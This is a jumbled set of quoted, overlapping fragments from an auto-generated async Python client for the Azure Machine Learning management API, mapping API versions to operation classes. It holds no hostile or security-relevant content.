OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "'2021-10-01': from ..v2021_10_01.aio.operations import BatchEndpointsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations", "self._get_api_version('delete') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DeleteOperations as OperationClass elif api_version", "operation group 'registry_management_non_workspace'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run(self): \"\"\"Instance depends", "..v2022_01_01_preview.aio.operations import Operations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import Operations", "2022-05-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentContainersOperations>` \"\"\" api_version = self._get_api_version('component_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchDeploymentsOperations as OperationClass elif api_version == '2022-05-01':", "be lost if the code is # regenerated. 
# -------------------------------------------------------------------------- from typing import", "== '2021-10-01': from ..v2021_10_01.aio.operations import QuotasOperations as OperationClass elif api_version == '2022-01-01-preview': from", "'2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import ComputeOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "'v1.0', 'experiments': 'v1.0', 'extensive_model': '1.0.0', 'get_operation_status': '1.5.0', 'metric': 'v1.0', 'migration': '1.0.0', 'models': '1.0.0',", "help you deal with all of the Azure clouds (Azure Stack, Azure Government,", "raise ValueError(\"API version {} is not available\".format(api_version)) @property def assets(self): \"\"\"Instance depends on", "{} does not have operation group 'compute'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatastoresOperations as OperationClass elif api_version ==", "== '1.5.0': from ..dataset_dataplane.aio.operations import DataVersionOperations as OperationClass else: raise ValueError(\"API version {}", "'1.5.0': from ..dataset_dataplane.aio.operations import DatasetsV1Operations as OperationClass else: raise ValueError(\"API version {} does", "'virtual_machine_sizes'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_connections(self): \"\"\"Instance depends on the", ":class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceFeaturesOperations>` * 2022-05-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceFeaturesOperations>` \"\"\" api_version = 
self._get_api_version('workspace_features') if api_version == '2021-10-01': from", "dataset_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`DatasetContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetContainersOperations>` \"\"\" api_version =", "def operations(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`Operations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.Operations>` * 2022-01-01-preview:", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_container(self): \"\"\"Instance depends on the API", "from ..v2021_10_01.aio.operations import ComponentVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import", "..v2020_09_01_dataplanepreview import models return models elif api_version == '2021-10-01': from ..v2021_10_01 import models", "ValueError(\"API version {} does not have operation group 'code_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "operation group 'data_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_version(self): \"\"\"Instance depends", "{} does not have operation group 'private_endpoint_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "if api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import TemporaryDataReferencesOperations as OperationClass else: raise ValueError(\"API", "api_version == '2022-05-01': from 
..v2022_05_01.aio.operations import ComponentVersionsOperations as OperationClass else: raise ValueError(\"API version", "if no profile is provided, or if missing in profile. :type api_version: str", "\"\"\" api_version = self._get_api_version('online_deployments') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import OnlineDeploymentsOperations as", "from azure.core.credentials_async import AsyncTokenCredential class _SDKClient(object): def __init__(self, *args, **kwargs): \"\"\"This is a", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'metric'\".format(api_version)) return", "== '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineEndpointsOperations as OperationClass elif api_version == '2022-05-01': from", "not have operation group 'registry_management_non_workspace'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run(self):", ":keyword int polling_interval: Default waiting time between two polls for LRO operations if", "api_version = self._get_api_version('component_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComponentContainersOperations as OperationClass", "typing import Any, Optional, TYPE_CHECKING from azure.mgmt.core import AsyncARMPipelineClient from azure.profiles import KnownProfiles,", "= self._get_api_version('datasets_v1') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetsV1Operations as OperationClass else:", "== '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeContainersOperations as OperationClass elif api_version == '2022-05-01': from", "self._get_api_version('code_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import CodeVersionsOperations as OperationClass elif api_version", ":type subscription_id: str 
:param api_version: API version to use if no profile is", "'2021-10-01': from ..v2021_10_01 import models return models elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComponentContainersOperations as OperationClass else: raise", "SpansOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "{} does not have operation group 'async_operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "OnlineDeploymentsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineDeploymentsOperations as OperationClass", ":class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentContainersOperations>` \"\"\" api_version = self._get_api_version('environment_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentContainersOperations", "operation group 'run_artifacts'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def runs(self): \"\"\"Instance depends", "from ..registry_discovery.aio.operations import AsyncOperationsOperations as OperationClass else: raise ValueError(\"API version {} does not", ":mod:`v2020_09_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.models>` * 2021-10-01: :mod:`v2021_10_01.models<azure.mgmt.machinelearningservices.v2021_10_01.models>` * 2021-10-01-dataplanepreview: :mod:`v2021_10_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.models>` * 2022-01-01-preview: 
:mod:`v2022_01_01_preview.models<azure.mgmt.machinelearningservices.v2022_01_01_preview.models>` * 2022-02-01-preview: :mod:`v2022_02_01_preview.models<azure.mgmt.machinelearningservices.v2022_02_01_preview.models>`", "import ModelContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "version {} does not have operation group 'models'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "..v2022_02_01_preview.aio.operations import DataVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DataVersionsOperations", "from ..v2022_02_01_preview.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "between two polls for LRO operations if no Retry-After header is present. \"\"\"", ":type base_url: str :param profile: A profile definition, from KnownProfiles to dict. 
:type", "def batch_job_endpoint(self): \"\"\"Instance depends on the API version: * 2020-09-01-dataplanepreview: :class:`BatchJobEndpointOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobEndpointOperations>` \"\"\" api_version", "api_version = self._get_api_version('code_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import CodeVersionsOperations as OperationClass", "batch_job_deployment(self): \"\"\"Instance depends on the API version: * 2020-09-01-dataplanepreview: :class:`BatchJobDeploymentOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobDeploymentOperations>` \"\"\" api_version =", "elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineEndpointsOperations as OperationClass elif api_version ==", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_container(self): \"\"\"Instance depends on the API version:", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import OnlineDeploymentsOperations as OperationClass else: raise ValueError(\"API version", "behavior and will be lost if the code is # regenerated. # --------------------------------------------------------------------------", "DataVersionOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "uses the latest API version available on public Azure. 
For production, you should", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_v2(self): \"\"\"Instance depends on the API version: * 1.5.0:", "version: * v1.0: :class:`EventsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.EventsOperations>` \"\"\" api_version = self._get_api_version('events') if api_version == 'v1.0': from", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def async_operations(self): \"\"\"Instance depends on the API", "'component_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_versions(self): \"\"\"Instance depends on the", "ComponentContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComponentContainersOperations as OperationClass", "{} does not have operation group 'virtual_machine_sizes'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", ":class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateLinkResourcesOperations>` * 2022-01-01-preview: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateLinkResourcesOperations>` * 2022-05-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateLinkResourcesOperations>` \"\"\" api_version = self._get_api_version('private_link_resources') if api_version", "on the API version: * 2022-02-01-preview: 
:class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataContainersOperations>` * 2022-05-01: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataContainersOperations>` \"\"\" api_version =", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import JobsOperations as OperationClass elif api_version == '2022-05-01':", "does not have operation group 'dataset_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "from ..v2022_05_01.aio.operations import Operations as OperationClass else: raise ValueError(\"API version {} does not", "{} does not have operation group 'operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "ValueError(\"API version {} does not have operation group 'migration'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "multiple API versions, to help you deal with all of the Azure clouds", "api_version = self._get_api_version('dataset_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatasetContainersOperations as OperationClass", "api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelVersionsOperations as OperationClass elif api_version == '2022-02-01-preview':", "self._get_api_version('datasets_v1') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetsV1Operations as OperationClass else: raise", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'temporary_data_references'\".format(api_version)) return", "\"\"\"These APIs allow end users 
to operate on Azure Machine Learning Workspace resources.", "'2021-10-01': from ..v2021_10_01.aio.operations import OnlineEndpointsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations", "version: * v1.0: :class:`RunArtifactsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunArtifactsOperations>` \"\"\" api_version = self._get_api_version('run_artifacts') if api_version == 'v1.0': from", "ModelVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "api_version = self._get_api_version('data_container') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataContainerOperations as OperationClass", "api-version parameter sets the default API version if the operation group is not", "= self._get_api_version('batch_endpoints') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import BatchEndpointsOperations as OperationClass elif", "import ModelContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelContainersOperations as", "@property def code_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeContainersOperations>` *", "models return models elif api_version == '1.0.0': from ..model_dataplane import models return models", "if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataCallOperations as OperationClass else: raise ValueError(\"API", "== '2022-05-01': from ..v2022_05_01.aio.operations import BatchEndpointsOperations as OperationClass else: raise ValueError(\"API version {}", "ValueError(\"API version {} does not have operation group 'data_containers'\".format(api_version)) return OperationClass(self._client, self._config, 
Serializer(self._models_dict(api_version)),", "api_version = self._get_api_version('usages') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import UsagesOperations as OperationClass", "else: raise ValueError(\"API version {} does not have operation group 'quotas'\".format(api_version)) return OperationClass(self._client,", "'v1.0', 'extensive_model': '1.0.0', 'get_operation_status': '1.5.0', 'metric': 'v1.0', 'migration': '1.0.0', 'models': '1.0.0', 'registry_management_non_workspace': 'v1.0',", "OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceFeaturesOperations as OperationClass elif api_version", "2022-05-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateEndpointConnectionsOperations>` \"\"\" api_version = self._get_api_version('private_endpoint_connections') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "2021-10-01-dataplanepreview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeVersionsOperations>` * 2022-02-01-preview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeVersionsOperations>` * 2022-05-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeVersionsOperations>` \"\"\" api_version = self._get_api_version('code_versions') if", ":class:`AsyncOperationsOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.AsyncOperationsOperations>` \"\"\" api_version = self._get_api_version('async_operations') if api_version == 'v1.0': from ..registry_discovery.aio.operations import AsyncOperationsOperations", "as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentVersionsOperations as OperationClass elif", "does not 
have operation group 'assets'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "KnownProfiles = KnownProfiles.default, **kwargs # type: Any ) -> None: self._config = AzureMachineLearningWorkspacesConfiguration(credential,", "have operation group 'workspace_features'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspaces(self): \"\"\"Instance", "group 'get_operation_status'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def jobs(self): \"\"\"Instance depends on", "..v2022_02_01_preview.aio.operations import CodeVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import CodeVersionsOperations", "raise ValueError(\"API version {} does not have operation group 'usages'\".format(api_version)) return OperationClass(self._client, self._config,", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_versions(self): \"\"\"Instance depends on the API version: *", "else: raise ValueError(\"API version {} does not have operation group 'virtual_machine_sizes'\".format(api_version)) return OperationClass(self._client,", "if the code is # regenerated. 
# -------------------------------------------------------------------------- from typing import Any, Optional,", "1.0.0: :class:`ExtensiveModelOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ExtensiveModelOperations>` \"\"\" api_version = self._get_api_version('extensive_model') if api_version == '1.0.0': from ..model_dataplane.aio.operations import", "model_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelVersionsOperations>`", "+ \" latest\" ) def __init__( self, credential: \"AsyncTokenCredential\", subscription_id: str, api_version: Optional[str]", "base_url: str = \"https://management.azure.com\", profile: KnownProfiles = KnownProfiles.default, **kwargs # type: Any )", "from ..v2022_05_01.aio.operations import OnlineEndpointsOperations as OperationClass else: raise ValueError(\"API version {} does not", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import OnlineEndpointsOperations as OperationClass else: raise", "def batch_endpoints(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchEndpointsOperations>` * 2022-02-01-preview:", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'quotas'\".format(api_version)) return", "{} does not have operation group 'model_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import 
BatchEndpointsOperations as OperationClass elif api_version", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'registry_management_non_workspace'\".format(api_version)) return", "import DataContainerOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview import models return models elif api_version == '2022-01-01-preview':", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_containers(self): \"\"\"Instance depends on the API version:", "2021-10-01-dataplanepreview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentVersionsOperations>` * 2022-02-01-preview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentVersionsOperations>` * 2022-05-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentVersionsOperations>` \"\"\" api_version = self._get_api_version('component_versions') if", "EnvironmentVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentVersionsOperations as OperationClass", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'workspaces'\".format(api_version)) return", "'v1.0': from ..registry_discovery.aio.operations import AsyncOperationsOperations as OperationClass else: raise ValueError(\"API version {} does", "operation group 'environment_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def events(self): \"\"\"Instance depends", "import ModelVersionsOperations as 
OperationClass else: raise ValueError(\"API version {} does not have operation", "depends on the API version: * 1.5.0: :class:`DatasetControllerV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetControllerV2Operations>` \"\"\" api_version = self._get_api_version('dataset_controller_v2') if", "raise ValueError(\"API version {} does not have operation group 'data_containers'\".format(api_version)) return OperationClass(self._client, self._config,", "..runhistory.aio.operations import ExperimentsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "API version: * 2021-10-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComputeOperations>` * 2022-01-01-preview: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.ComputeOperations>` * 2022-05-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComputeOperations>` \"\"\" api_version", "ModelsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import OnlineEndpointsOperations as OperationClass else: raise ValueError(\"API", "mapping between an operation group and its API version. 
The api-version parameter sets", ":class:`EventsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.EventsOperations>` \"\"\" api_version = self._get_api_version('events') if api_version == 'v1.0': from ..runhistory.aio.operations import EventsOperations", "import BatchJobEndpointOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "'1.5.0', 'dataset_containers': '2021-10-01', 'dataset_controller_v2': '1.5.0', 'dataset_v2': '1.5.0', 'dataset_versions': '2021-10-01', 'datasets_v1': '1.5.0', 'delete': 'v1.0',", "operation group 'metric'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def migration(self): \"\"\"Instance depends", "Changes may cause incorrect behavior and will be lost if the code is", "version {} does not have operation group 'dataset_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "* 2022-02-01-preview: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineEndpointsOperations>` * 2022-05-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineEndpointsOperations>` \"\"\" api_version = self._get_api_version('online_endpoints') if api_version ==", "GetOperationStatusOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import QuotasOperations as OperationClass elif api_version", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import UsagesOperations as OperationClass else: raise ValueError(\"API version", "import MigrationOperations as OperationClass else: raise ValueError(\"API 
version {} does not have operation", "* 2022-01-01-preview: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.UsagesOperations>` * 2022-05-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.UsagesOperations>` \"\"\" api_version = self._get_api_version('usages') if api_version ==", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import QuotasOperations as OperationClass elif api_version == '2022-01-01-preview':", "version {} does not have operation group 'spans'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "api_version = self._get_api_version('operations') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import Operations as OperationClass", "models return models raise ValueError(\"API version {} is not available\".format(api_version)) @property def assets(self):", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeVersionsOperations>` *", "on the API version: * 2021-10-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-01-01-preview: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-05-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateEndpointConnectionsOperations>`", "* 2022-05-01: 
:class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchDeploymentsOperations>` \"\"\" api_version = self._get_api_version('batch_deployments') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "{} does not have operation group 'code_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchEndpointsOperations>` * 2022-02-01-preview: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchEndpointsOperations>` *", "from ..runhistory.aio.operations import MetricOperations as OperationClass else: raise ValueError(\"API version {} does not", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_versions(self): \"\"\"Instance depends on the API version: *", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'get_operation_status'\".format(api_version)) return", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'batch_job_deployment'\".format(api_version)) return", "* v1.0: :class:`EventsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.EventsOperations>` \"\"\" api_version = self._get_api_version('events') if api_version == 'v1.0': from ..runhistory.aio.operations", "import SpansOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) async def close(self): await self._client.close() async def __aenter__(self): await self._client.__aenter__()", "have operation group 
'spans'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def temporary_data_references(self): \"\"\"Instance", "== '2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceConnectionsOperations as OperationClass else: raise ValueError(\"API version {}", "API version: * 1.5.0: :class:`DataVersionOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataVersionOperations>` \"\"\" api_version = self._get_api_version('data_version') if api_version == '1.5.0':", "CodeContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "'2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations", "elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DatastoresOperations as OperationClass elif api_version ==", "* 1.5.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DeleteOperations>` * v1.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.DeleteOperations>` \"\"\" api_version = self._get_api_version('delete') if api_version ==", "from ..v2022_02_01_preview import models return models elif api_version == '2022-05-01': from ..v2022_05_01 import", "does not have operation group 'registry_management_non_workspace'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "raise ValueError(\"API version {} does not have operation group 'batch_endpoints'\".format(api_version)) return OperationClass(self._client, self._config,", "self._get_api_version('data_container') if api_version == 
'1.5.0': from ..dataset_dataplane.aio.operations import DataContainerOperations as OperationClass else: raise", "== '2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentVersionsOperations as OperationClass else: raise ValueError(\"API version {}", "on the API version: * v1.0: :class:`EventsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.EventsOperations>` \"\"\" api_version = self._get_api_version('events') if api_version", "from ..v2021_10_01.aio.operations import CodeVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import", "depends on the API version: * 2021-10-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.JobsOperations>` * 2022-02-01-preview: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.JobsOperations>` * 2022-05-01:", "== '2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from", "version {} does not have operation group 'datastores'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "* 2021-10-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchEndpointsOperations>` * 2022-02-01-preview: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchEndpointsOperations>` * 2022-05-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchEndpointsOperations>` \"\"\" api_version = self._get_api_version('batch_endpoints')", "from ..v2022_05_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass else: raise ValueError(\"API version {} does not", "else: raise 
